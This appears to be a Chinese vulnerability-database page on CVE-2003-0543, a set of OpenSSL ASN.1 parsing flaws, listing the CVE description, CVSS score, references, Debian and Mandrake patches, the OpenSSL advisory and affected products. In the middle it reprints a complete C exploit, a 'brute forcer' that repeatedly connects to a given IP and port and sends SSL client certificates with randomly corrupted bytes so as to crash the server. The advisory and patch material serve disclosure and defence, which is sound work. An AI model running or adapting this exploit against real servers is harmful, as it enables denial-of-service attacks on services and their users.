CVE-2003-0543
CVSS5.0
发布时间 :2003-11-17 00:00:00
修订时间 :2011-03-07 21:12:45
NMCOEPS    

[原文]Integer overflow in OpenSSL 0.9.6 and 0.9.7 allows remote attackers to cause a denial of service (crash) via an SSL client certificate with certain ASN.1 tag values.


[CNNVD]OpenSSL ASN.1多个解析安全漏洞(CNNVD-200311-070)

        
        OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。
        OpenSSL中的ASN.1解析代码存在多个问题,远程攻击者可以利用这个漏洞对系统进行拒绝服务攻击或执行任意代码。
        漏洞问题如下:
        1、部分ASN.1编码被解析器会由于非法而拒绝,当处理对应的数据结构时会触发错误而破坏堆栈,这可用于远程拒绝服务。目前还不清楚是否可用于执行任意代码。此漏洞不影响OpenSSL 0.9.6版本。
        2、不正确ASN.1标记值可在部分条件下引起读取非法边界值(整数溢出问题),可导致拒绝服务漏洞。
        3、如果设置成忽略公钥解码错误,证书中包含畸形公钥会引起服务崩溃。公钥解码错误一般不忽略(除非在调试情况下)。目前还不清楚是否可利用执行任意代码。
        4、由于在SSL/TLS协议处理上存在错误,当没有指定请求时服务器也会解析客户端证书。这严格的来说不是一个漏洞,但是这意味着使用OpenSSL的SSL/TLS服务器可使用漏洞1,2,3进行攻击,即使没有启用客户端验证的情况下。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:openssl:openssl:0.9.6OpenSSL Project OpenSSL 0.9.6
cpe:/a:openssl:openssl:0.9.7OpenSSL Project OpenSSL 0.9.7

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5292Multiple Vendor OpenSSL 0.9.6, 0.9.7 ASN.1 Vulnerabilities
oval:org.mitre.oval:def:4254OpenSSL Integer Overflow Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0543
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0543
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-070
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/255484
(UNKNOWN)  CERT-VN  VU#255484
http://www.cert.org/advisories/CA-2003-26.html
(UNKNOWN)  CERT  CA-2003-26
http://www.redhat.com/support/errata/RHSA-2003-291.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:291
http://www.vupen.com/english/advisories/2006/3900
(UNKNOWN)  VUPEN  ADV-2006-3900
http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
(UNKNOWN)  MISC  http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
http://www.redhat.com/support/errata/RHSA-2003-292.html
(UNKNOWN)  REDHAT  RHSA-2003:292
http://www.linuxsecurity.com/advisories/engarde_advisory-3693.html
(UNKNOWN)  ENGARDE  ESA-20030930-027
http://www.debian.org/security/2003/dsa-394
(UNKNOWN)  DEBIAN  DSA-394
http://www.debian.org/security/2003/dsa-393
(UNKNOWN)  DEBIAN  DSA-393
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201029-1
(UNKNOWN)  SUNALERT  201029
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893
(VENDOR_ADVISORY)  CONFIRM  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893
http://www.securityfocus.com/bid/8732
(UNKNOWN)  BID  8732
http://www-1.ibm.com/support/docview.wss?uid=swg21247112
(UNKNOWN)  CONFIRM  http://www-1.ibm.com/support/docview.wss?uid=swg21247112
http://secunia.com/advisories/22249
(UNKNOWN)  SECUNIA  22249

- 漏洞信息

OpenSSL ASN.1多个解析安全漏洞
中危 未知
2003-11-17 00:00:00 2010-01-28 00:00:00
远程  
        
        OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。
        OpenSSL中的ASN.1解析代码存在多个问题,远程攻击者可以利用这个漏洞对系统进行拒绝服务攻击或执行任意代码。
        漏洞问题如下:
        1、部分ASN.1编码被解析器会由于非法而拒绝,当处理对应的数据结构时会触发错误而破坏堆栈,这可用于远程拒绝服务。目前还不清楚是否可用于执行任意代码。此漏洞不影响OpenSSL 0.9.6版本。
        2、不正确ASN.1标记值可在部分条件下引起读取非法边界值(整数溢出问题),可导致拒绝服务漏洞。
        3、如果设置成忽略公钥解码错误,证书中包含畸形公钥会引起服务崩溃。公钥解码错误一般不忽略(除非在调试情况下)。目前还不清楚是否可利用执行任意代码。
        4、由于在SSL/TLS协议处理上存在错误,当没有指定请求时服务器也会解析客户端证书。这严格的来说不是一个漏洞,但是这意味着使用OpenSSL的SSL/TLS服务器可使用漏洞1,2,3进行攻击,即使没有启用客户端验证的情况下。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-394-1)以及相应补丁:
        DSA-394-1:New openssl095 packages fix denial of service
        链接:
        http://www.debian.org/security/2002/dsa-394

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.dsc

        Size/MD5 checksum: 631 ba6e597ab2db2984aef6c2a765ac29c0
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.diff.gz

        Size/MD5 checksum: 38851 6b197111a7068a7ea29ef55176771d89
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz

        Size/MD5 checksum: 1892089 99d22f1d4d23ff8b927f94a9df3997b4
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_alpha.deb

        Size/MD5 checksum: 497152 fe3d6854382f8dbe2d10f3f5700dd8f6
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_arm.deb

        Size/MD5 checksum: 402498 551b79fbb80903f174d6edeffd9869df
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_i386.deb

        Size/MD5 checksum: 399752 2a856ac6b45d41beb0bf78880b236966
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_m68k.deb

        Size/MD5 checksum: 376738 980e428e9b913672d939ebe77c18cd6d
        Big endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mips.deb

        Size/MD5 checksum: 412624 b8c7cc0b4dcbf1cf03480b93c78cd610
        Little endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mipsel.deb

        Size/MD5 checksum: 407388 de02385580cf33c344c1ffadcf8aed88
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_powerpc.deb

        Size/MD5 checksum: 425452 c3d04af89c64e6e9f0175e6cd4997058
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_sparc.deb

        Size/MD5 checksum: 412196 ae1181c2873a304c583800459da53e5a
        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        HP
        --
        
        http://www.debian.org/security/2003/dsa-394

        MandrakeSoft
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        MandrakeSoft Corporate Server 2.1 x86_64:
        Mandrake Upgrade libopenssl0-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        MandrakeSoft Corporate Server 2.1:
        Mandrake Upgrade libopenssl0-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        MandrakeSoft Multi Network Firewall 8.2:
        Mandrake Upgrade libopenssl0-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Multi Network Firewall 8.2 FTP Folder: mnf8.2/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Multi Network Firewall 8.2 FTP Folder: mnf8.2/RPMS/
        MandrakeSoft Linux Mandrake 8.2:
        Mandrake Upgrade libopenssl0-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        MandrakeSoft Linux Mandrake 9.0:
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 9.0 FTP Folder: 9.0/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 9.0 FTP Folder: 9.0/RPMS/
        Mandrake Upgrade openssl-0

- 漏洞信息 (146)

Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b) (EDBID:146)
multiple dos
2003-10-09 Verified
0 Bram Matthys
N/A [点击下载]
/* Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)
 * written by Bram Matthys (Syzop) on Oct 9 2003.
 *
 * This program sends corrupt client certificates to the SSL
 * server which will 1) crash it 2) create lots of error messages,
 * and/or 3) result in other "interresting" behavior.
 *
 * I was able to crash my own ssl app in 5-15 attempts,
 * apache-ssl only generated error messages but after several hours
 * some childs went into some kind of eat-all-cpu-loop... so YMMV.
 *
 * It's quite ugly but seems to compile at Linux/FreeBSD.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/signal.h>
#include <arpa/nameser.h>
#include <sys/time.h>
#include <time.h>
#include <errno.h>

char buf[8192];

/* This was simply sniffed from an stunnel session */
const char dacrap[] = 
"\x16\x03\x00\x02\x47\x0b\x00\x02\x43\x00\x02\x40\x00\x02\x3d\x30\x82"
"\x02\x39\x30\x82\x01\xa2\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06"
"\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x30\x57\x31\x0b\x30"
"\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06\x03\x55"
"\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31\x1f\x30"
"\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c\x20\x44"
"\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12\x30\x10"
"\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x30"
"\x1e\x17\x0d\x30\x33\x30\x36\x31\x32\x32\x33\x35\x30\x34\x39\x5a\x17"
"\x0d\x30\x34\x30\x36\x31\x31\x32\x33\x35\x30\x34\x39\x5a\x30\x57\x31"
"\x0b\x30\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06"
"\x03\x55\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31"
"\x1f\x30\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c"
"\x20\x44\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12"
"\x30\x10\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73"
"\x74\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01"
"\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xe6\x95\x5c\xc0"
"\xcb\x03\x78\xf1\x1e\xaa\x45\xb7\xa4\x10\xd0\xc1\xd5\xc3\x8c\xcc\xca"
"\x17\x7b\x48\x9a\x21\xf2\xfa\xc3\x25\x07\x0b\xb7\x69\x17\xca\x59\xf7"
"\xdf\x67\x7b\xf1\x72\xd5\x05\x61\x73\xe8\x70\xbf\xb9\xfa\xc8\x4b\x03"
"\x41\x62\x71\xf9\xf5\x4e\x28\xb8\x3b\xe4\x33\x76\x47\xcc\x1e\x04\x71"
"\xda\xc4\x0b\x05\x46\xf4\x52\x72\x99\x43\x36\xf7\x37\x6d\x04\x1c\x7a"
"\xde\x2a\x0c\x45\x4a\xb6\x48\x33\x3a\xad\xec\x16\xcc\xe7\x99\x58\xfd"
"\xef\x4c\xc6\xdd\x39\x76\xb6\x50\x76\x2a\x7d\xa0\x20\xee\xb4\x2c\xe0"
"\xd2\xc9\xa1\x2e\x31\x02\x03\x01\x00\x01\xa3\x15\x30\x13\x30\x11\x06"
"\x09\x60\x86\x48\x01\x86\xf8\x42\x01\x01\x04\x04\x03\x02\x06\x40\x30"
"\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x03\x81\x81"
"\x00\x9f\xff\xa9\x93\x70\xb9\xae\x48\x47\x09\xa1\x11\xbf\x01\x34\xbf"
"\x1f\x1e\xed\x88\x3e\x57\xe0\x37\x72\x0d\xec\xc7\x21\x44\x12\x99\x3a"
"\xfa\xaf\x79\x57\xf4\x7f\x99\x68\x37\xb1\x17\x83\xd3\x51\x44\xbd\x50"
"\x67\xf8\xd6\xd0\x93\x00\xbb\x53\x3d\xe2\x3d\x34\xfc\xed\x60\x85\xea"
"\x67\x7f\x91\xec\xfa\xe3\xd8\x78\xa2\xf4\x61\xfa\x77\xa3\x3f\xe4\xb1"
"\x41\x95\x47\x23\x03\x1c\xbf\x2e\x40\x77\x82\xef\xa0\x17\x82\x85\x03"
"\x90\x35\x4e\x85\x0d\x0f\x4d\xea\x16\xf5\xce\x15\x21\x10\xf9\x56\xd0"
"\xa9\x08\xe5\xf9\x9d\x5c\x43\x75\x33\xe2\x16\x03\x00\x00\x84\x10\x00"
"\x00\x80\x6e\xe4\x26\x03\x97\xb4\x5d\x58\x70\x36\x98\x31\x62\xd4\xef"
"\x7b\x4e\x53\x99\xad\x72\x27\xaf\x05\xd4\xc9\x89\xca\x04\xf1\x24\xa4"
"\xa3\x82\xb5\x89\x3a\x2e\x8f\x3f\xf3\xe1\x7e\x52\x11\xb2\xf2\x29\x95"
"\xe0\xb0\xe9\x3f\x29\xaf\xc1\xcd\x77\x54\x6a\xeb\xf6\x81\x6b\xd5\xd6"
"\x0a\x3d\xc3\xff\x6f\x76\x4a\xf7\xc9\x61\x9f\x7b\xb3\x25\xe0\x2b\x09"
"\x53\xcf\x06\x1c\x82\x9c\x48\x37\xfa\x71\x27\x97\xec\xae\x6f\x4f\x75"
"\xb1\xa5\x84\x99\xf5\xed\x8c\xba\x0f\xd5\x33\x31\x61\x5d\x95\x77\x65"
"\x8d\x89\x0c\x7d\xa7\xa8\x95\x5a\xc7\xb8\x35\x16\x03\x00\x00\x86\x0f"
"\x00\x00\x82\x00\x80\x78\x1d\xbd\x86\xcb\x6e\x06\x88\x57\x9e\x3d\x21"
"\x7e\xca\xd1\x75\xff\x33\xef\x48\x4d\x88\x96\x84\x8c\x2f\xfb\x92\x1d"
"\x15\x28\xef\xe0\xd3\x4d\x20\xe9\xae\x6c\x5c\xed\x46\xc0\xef\x4e\xb4"
"\xe4\xcf\xe9\x73\xb8\xd2\x8b\xe6\x5e\xb9\x0c\x67\xbe\x17\x13\x31\x3f"
"\xe5\xe1\x9a\x2d\xfe\xb4\xd6\xdb\x8f\xbc\x15\x22\x10\x65\xe1\xad\x5f"
"\x00\xd0\x48\x8d\x4e\xa7\x08\xbd\x5c\x40\x77\xb8\xa9\xbe\x58\xb0\x15"
"\xd2\x4c\xc8\xa1\x79\x63\x25\xeb\xa1\x32\x61\x3b\x49\x82\xf1\x3a\x70"
"\x80\xf8\xdc\xf7\xf9\xfc\x50\xc7\xa2\x5d\xe4\x30\x8e\x09\x14\x03\x00"
"\x00\x01\x01\x16\x03\x00\x00\x40\xfe\xc2\x1f\x94\x7e\xf3\x0b\xd1\xe1"
"\x5c\x27\x34\x7f\x01\xe9\x51\xd3\x18\x33\x9a\x99\x48\x6e\x13\x6f\x82"
"\xb2\x2c\xa5\x7b\x36\x5d\x85\xf5\x17\xe3\x4f\x2a\x04\x15\x2d\x0e\x2f"
"\x2c\xf9\x1c\xf8\x9e\xac\xd5\x6c\x20\x81\xe5\x22\x54\xf1\xe1\xd0\xfd"
"\x64\x42\xfb\x34";

#define CRAPLEN (sizeof(dacrap)-1)


int send_hello()
{
int len;
char *p = buf;
	*p++ = 22;				/* Handshake */
	PUTSHORT(0x0300, p);	/* SSL v3 */
	PUTSHORT(85, p);		/* Length will be 85 bytes */
	
	*p++ = 1;				/* Client hello */

	*p++ = 0;				/* Length: */
	PUTSHORT(81, p);		/* 81 bytes */

	PUTSHORT(0x0300, p);	/* SSL v3 */
	PUTLONG(0xffffffff, p);	/* Random.gmt_unix_time */

	/* Now 28 bytes of random data... (7x4bytes=28) */
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);

	*p++ = 0;				/* Session ID 0 */
	
	PUTSHORT(42, p);		/* Cipher Suites Length */
	PUTSHORT(0x16, p);
	PUTSHORT(0x13, p);
	PUTSHORT(0x0a, p);
	PUTSHORT(0x66, p);
	PUTSHORT(0x07, p);
	PUTSHORT(0x05, p);
	PUTSHORT(0x04, p);
	PUTSHORT(0x65, p);
	PUTSHORT(0x64, p);
	PUTSHORT(0x63, p);
	PUTSHORT(0x62, p);
	PUTSHORT(0x61, p);
	PUTSHORT(0x60, p);
	PUTSHORT(0x15, p);
	PUTSHORT(0x12, p);
	PUTSHORT(0x09, p);
	PUTSHORT(0x14, p);
	PUTSHORT(0x11, p);
	PUTSHORT(0x08, p);
	PUTSHORT(0x06, p);
	PUTSHORT(0x03, p);

	*p++ = 1;				/* Compresion method length: 1 */
	*p++ = 0;				/* (null) */

	len = p - buf;
	return len;
}

int send_crap()
{
	memcpy(buf, dacrap, CRAPLEN);
	return CRAPLEN;
}



void corruptor(char *buf, int len)
{
int cb, i, l;

	cb = rand()%15+1; /* bytes to corrupt */

	for (i=0; i < cb; i++)
	{
		l = rand()%len;
		buf[l] = rand()%256;
	}
}

void diffit()
{
int i;
	printf("DIFF:\n");
	for (i=0; i < CRAPLEN; i++)
	{
		if (buf[i] != dacrap[i])
			printf("Offset %d: 0x%x -> 0x%x\n", i, dacrap[i], buf[i]);
	}
	printf("*****\n");
}


int main(int argc, char *argv[])
{
	struct sockaddr_in addr;
	int s, port = 0, first = 1, len;
	char *host = NULL;
	unsigned int seed;
	struct timeval tv;

	printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");
	
	if (argc != 3) {
		fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
		exit(1);
	}

	host = argv[1];
	port = atoi(argv[2]);
	if ((port < 1) || (port > 65535)) {
		fprintf(stderr, "Port out of range (%d)\n", port);
		exit(1);
	}

	gettimeofday(&tv, NULL);
	seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);

	printf("seed = %u\n", seed);
	srand(seed);

	memset(&addr, 0, sizeof(addr));


	signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */

while(1)
{

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		fprintf(stderr, "Socket error: %s\n", strerror(errno));
		exit(EXIT_FAILURE);
	}
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);
	addr.sin_addr.s_addr = inet_addr(host);
	if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
		if (!first)
			diffit();
		exit(EXIT_FAILURE);
	}
	first = 0;
	printf("."); fflush(stdout);

	len = send_hello();
	write(s, buf, len);
	len = send_crap();
	corruptor(buf, len);
	write(s, buf, len);
	usleep(1000); /* wait.. */
	close(s);
}
	
	exit(EXIT_SUCCESS);
}



// milw0rm.com [2004-01-21]		

- 漏洞信息 (F32590)

sslexp.c (PacketStormID:F32590)
2004-01-30 00:00:00
Bram Matthys  
exploit
CVE-2003-0545,CVE-2003-0543,CVE-2003-0544
[点击下载]

Brute forcer for OpenSSL ASN.1 parsing bugs that affects versions 0.9.6j and below and 0.9.7b and below.

- 漏洞信息 (F31738)

secadv_20030930.txt (PacketStormID:F31738)
2003-09-30 00:00:00
 
advisory,denial of service,arbitrary,vulnerability,code execution
CVE-2003-0545,CVE-2003-0543,CVE-2003-0544
[点击下载]

Three vulnerabilities lie in the ASN.1 parsing for OpenSSL versions up to 0.9.6j and 0.9.7b and all versions of SSLeay. All of the vulnerabilities result in a denial of service and there is still speculation as to whether possible arbitrary code execution is possible.

-----BEGIN PGP SIGNED MESSAGE-----

OpenSSL Security Advisory [30 September 2003]

Vulnerabilities in ASN.1 parsing
================================

NISCC (www.niscc.gov.uk) prepared a test suite to check the operation
of SSL/TLS software when presented with a wide range of malformed client
certificates.

Dr Stephen Henson (steve@openssl.org) of the OpenSSL core team
identified and prepared fixes for a number of vulnerabilities in the
OpenSSL ASN1 code when running the test suite.

A bug in OpenSSLs SSL/TLS protocol was also identified which causes
OpenSSL to parse a client certificate from an SSL/TLS client when it
should reject it as a protocol error.

Vulnerabilities
- ---------------

1. Certain ASN.1 encodings that are rejected as invalid by the parser
can trigger a bug in the deallocation of the corresponding data
structure, corrupting the stack. This can be used as a denial of service
attack. It is currently unknown whether this can be exploited to run
malicious code. This issue does not affect OpenSSL 0.9.6.

2. Unusual ASN.1 tag values can cause an out of bounds read under
certain circumstances, resulting in a denial of service vulnerability.

3. A malformed public key in a certificate will crash the verify code if
it is set to ignore public key decoding errors. Public key decode errors
are not normally ignored, except for debugging purposes, so this is
unlikely to affect production code. Exploitation of an affected
application would result in a denial of service vulnerability.

4. Due to an error in the SSL/TLS protocol handling, a server will parse
a client certificate when one is not specifically requested. This by
itself is not strictly speaking a vulnerability but it does mean that
*all* SSL/TLS servers that use OpenSSL can be attacked using
vulnerabilities 1, 2 and 3 even if they don't enable client authentication.

Who is affected?
- ----------------

All versions of OpenSSL up to and including 0.9.6j and 0.9.7b and all
versions of SSLeay are affected.

Any application that makes use of OpenSSL's ASN1 library to parse
untrusted data. This includes all SSL or TLS applications, those using
S/MIME (PKCS#7) or certificate generation routines.

Recommendations
- ---------------

Upgrade to OpenSSL 0.9.7c or 0.9.6k. Recompile any OpenSSL applications
statically linked to OpenSSL libraries.

References
- ----------

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0545 for issue 1:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545

and CAN-2003-0543 and CAN-2003-0544 for issue 2:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20030930.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQCVAwUBP3mNKu6tTP1JpWPZAQFjPwP/Y8epYBa9oCK69dCT5Y90kg9Ir8pYuv+q
x4NxuyhD5JaJfmStwbl3BUSE5juI0mh7d6yFjfI0Ci3sdC+5v10ZOanGwX7o4JlS
3pGSSocAEiYS59qciRLtFsCbBt8jIOCG8KiTmKO2mI5dhAEB9UqPH9e8A1Wy/8un
xjGKYbcITrM=
=fFTe
-----END PGP SIGNATURE-----

    

- 漏洞信息

3949
OpenSSL ASN.1 Integer Handling Remote Overflow DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in a integer overflow. With a specially crafted request, an attacker can cause a denial of service in OpenSSL or an application using it, resulting in a loss of availability.

- 时间线

2003-09-30 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 0.9.7c or 0.9.6k. or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Recompile any OpenSSL applications statically linked to OpenSSL libraries.

- 相关参考

- 漏洞作者

- 漏洞信息

OpenSSL ASN.1 Parsing Vulnerabilities
Unknown 8732
Yes No
2003-09-30 12:00:00 2007-11-05 03:25:00
Discovery is credited to NISCC and Stephen Henson.

- 受影响的程序版本

VMWare GSX Server 2.5.1 build 5336
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 1.5.2
Tarantella Enterprise 3 3.30
Tarantella Enterprise 3 3.20 0
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.11
Tarantella Enterprise 3 3.10
Tarantella Enterprise 3 3.0 1
Tarantella Enterprise 3 3.0
Sun Solaris 9_x86
Sun Solaris 9
Sun ONE Web Server 6.0 SP6
Sun ONE Web Server 6.0 SP5
Sun ONE Web Server 6.0 SP4
Sun ONE Web Server 6.0 SP3
Sun ONE Web Server 6.0 SP2
Sun ONE Web Server 6.0 SP1
Sun ONE Web Server 6.0
Sun ONE Web Server 4.1 SP9
Sun ONE Web Server 4.1 SP8
Sun ONE Web Server 4.1 SP7
Sun ONE Web Server 4.1 SP6
Sun ONE Web Server 4.1 SP5
Sun ONE Web Server 4.1 SP5
Sun ONE Web Server 4.1 SP4
Sun ONE Web Server 4.1 SP3
Sun ONE Web Server 4.1 SP2
Sun ONE Web Server 4.1 SP14
Sun ONE Web Server 4.1 SP13
Sun ONE Web Server 4.1 SP12
Sun ONE Web Server 4.1 SP11
Sun ONE Web Server 4.1 SP10
Sun ONE Web Server 4.1 SP1
Sun ONE Directory Server 5.1 x86
Sun ONE Directory Server 5.1 SP2
Sun ONE Directory Server 5.1 SP1
Sun ONE Directory Server 5.1
- HP HP-UX 11.0
- HP HP-UX 11i v1
- IBM AIX 4.3.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Terminal Services SP2
